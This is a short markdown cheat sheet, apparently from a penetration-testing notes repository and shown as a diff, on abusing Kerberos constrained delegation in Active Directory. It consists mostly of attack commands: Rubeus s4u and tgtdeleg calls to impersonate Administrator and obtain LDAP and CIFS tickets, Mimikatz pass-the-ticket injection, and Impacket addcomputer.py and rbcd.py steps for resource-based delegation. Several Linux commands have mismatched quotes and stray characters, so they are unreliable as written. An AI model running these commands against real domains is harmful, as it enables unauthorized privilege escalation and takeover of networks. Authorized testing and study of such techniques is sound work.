H3llKa1ser/B00t2R00t/Active Directory Penetration Testing/Kerberos Delegation/Constrained Delegation.md

 # 1) Without protocol transition (kerberos only)  msDS-AllowedToDelegateTo TRUSTED_FOR_DELEGATION

+Any service can be specified on the target since it is not correctly checked.
+All the Rubeus commands can be performed with kekeo aswell.

+Windows

+### 1) Request a ticket for multiple services on the target, for another user (S4U)

+    .\Rubeus.exe s4u /user:user1 /rc4:<hash> /impersonateuser:Administrator /msdsspn:"time/<target>.domain.local" /altservice:ldap,cifs /ptt

+### 2) If we have a session as the user, we can just run .\Rubeus.exe tgtdeleg /nowrap to get the TGT in Base64, then run:

+    .\Rubeus.exe s4u /ticket:doIFCDC[SNIP]E9DQUw= /impersonateuser:Administrator /domain:domain.local /msdsspn:"time/<target>.domain.local" /altservice:ldap,cifs /ptt

+### 3) Inject the ticket

+    Invoke-Mimikatz -Command '"kerberos::ptt ticket.kirbi"'

+Linux

     addcomputer.py -computer-name 'RBCD_COM$' -computer-pass 'RBCD_COM_PASSWORD' -dc-ip DC -DOMAIN/USER:PASSWORD' (RBCD)

     rbcd.py -delegate-from 'RBCD_COM$' -delegate-to 'CONSTRAINED$' -dc-ip -'DC' -action 'write' -hashes 'HASH DOMAIN/CONSTRAINED$ (For Self RBCD, Skip the 1st step entirely)